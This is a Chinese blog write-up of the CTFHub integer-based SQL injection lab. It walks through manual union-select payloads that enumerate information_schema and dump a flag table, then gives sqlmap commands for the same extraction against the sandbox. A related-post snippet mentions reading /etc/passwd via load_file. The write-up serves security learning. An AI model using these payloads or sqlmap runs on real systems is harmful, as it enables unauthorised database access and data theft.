CTFHub-Web-SQL注入-整数型注入

已于 2022-07-20 21:44:14 修改
阅读量333 收藏 1
点赞数 1
分类专栏: 菜狗子web 文章标签: 大数据 sql sql注入
于 2022-06-26 23:08:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56301399/article/details/125475757
版权
本文详细介绍了如何进行SQL注入攻击,从手工注入的步骤到使用sqlmap工具的过程。通过示例展示了如何利用union select、information_schema等函数获取数据库信息,并最终获取敏感数据。同时强调了理解基本SQL语法和数据库操作的重要性。
摘要由CSDN通过智能技术生成

第一次做SQL注入,确实难。我甚至有点看不懂手工注入的步骤,我其实直接用工具sqlmap,然后规规矩矩的敲几行代码。

先看手工注入吧:

union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符

和一些基本sql语法
和一些基本注释:
#,–空格,/* */

首先开启题目,知道这一题整型注入,
所以不存在引号
于是利用:
1
1 and 1=1
1 and 1=2
去测试是否有sql漏洞

得到:

发现1 和 1 and 1=1,回显相同
而1 and 1=2,没有回显
得出结论,执行了逻辑语句and ,所以有sql漏洞

所以,我们可可以构造sql语句:
1 order by 1
1 order by 2
1 order by 3
查看有几个字段,得到:

 

于是就利用 union select 联合注入
这里应为 union 不允许出现重复
所以id要用一个空,我就用:520
构造语句:
520 union select 1,2

看见我们输入的函数被执行了,
于是在构造语句看数据库:

520 union select 1,group_concat(schema_name) from information_schema.schemata limit 1

看到所有数据库名:

 在构造语句查看当前数据库名:
520 union select 1,database()

 得到当前数据库:sqli
在构造语句查看数据库sqli中的表名:
520 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’ limit 1

得到表名,其中flag表为我们想得到的值
于是构造语句查看flag中的字段名:

520 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’ limit 1

得到字段flag,于是构造语句查询字段:

520 union select 1, group_concat(flag) from sqli.flag limit 1

得到flag:

然后就是sqlmap的使用了:

第一步:查看数据库

python sqlmap -u "http://challenge-97a3e176a7437521.sandbox.ctfhub.com:10800/?id=1" --batch --dbs

 第二步:查看数据库中的表

python sqlmap -u "http://challenge-97a3e176a7437521.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli

第三步:查看表中内容

python sqlmap -u "http://challenge-97a3e176a7437521.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T flag -D sqli

flag到手

参考链接:

ctfhub 整数型注入

http://t.csdn.cn/NuIGR

【CTFHub】sql注入-整数型注入 https://www.jianshu.com/p/05b33402afe9

ps:工具确实方便,但还是要继续学习一些数据库的基础操作,还有SQL注入的基本知识

长街395
关注
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 824
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1242
CTFHUB-WEB-SQL注入
ctfhub 整数型注入
plant1234的博客
06-16 1012
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub整数型注入
sGanYu
07-24 2288
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类型的注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数型 开始爆字段id=1 order by 1,当id =1.
整数型SQL注入
最新发布
qq_69100706的博客
07-29 204
CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类型,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2600
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 650
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB(六)之整数型注入
ScyLamb的博客
03-03 261
直接跑sqlmap sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 看到可注入 sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs 下意识选了sqli sqlmap -u http://...
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5503
Ctfhub解题 web SQL注入
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7147
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 578
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
ctfhub 整数型注入(手动注入
qq_54929891的博客
09-14 478
这段时间看了web安全里面有关sql注入以及一些博客,终于基本了解了一下如何做这种题目用手动注入 第一步,判断是否有注入点(构造sql语句来比对不同) 这是按照提示输入1回显结果,我们可以利用恒真恒假来判断是否修改语句有用 发现输入恒假1=2的时候没有回显,代表有注入点,可以改变sql语句 第二步 利用order by来获取回显的信息判断字段数(因为这个题目没有引号,加不加#省略号没有影响) 发现字段数为2,order by 3的时候没有回显利用1 and 1=2恒假语句来把原先的..
[CTFHub]整数型注入webSQL注入
ZXW_NUDT的博客
05-12 314
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1347
整型SQL注入
CTFHub 整数型注入sqlmap)
qq_54929891的博客
09-12 411
00
CTFHUB-技能树-Web题-SQL注入-整数型注入
Static______的博客
03-28 533
利用 group_concat() 函数进行查询连接所有的表名。还可以读取到 /etc/passwd 文件。load_file( )函数 读文件操作。1,2又有数值,说明两字段都有回显。由此判断存在两个字段。
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 461
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
CTF hub 整数型注入
m0_63253040的博客
02-24 1222
尝试输入1,发现有回显 题目给出了查询语句,为整数型,再验证下 判断为整数型没错,若为字符型,则 select * from news where id = '1 and 1=1' select * from news where id = '1 and 1=2' 不会出现上述结果。 爆字段 发现2正常回显 3不显,只有2个字段 再看看数据库:sqli 3 union select 1,database() //3是为了先保证之前的数据查不出来 ...
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 356
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

长街395

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值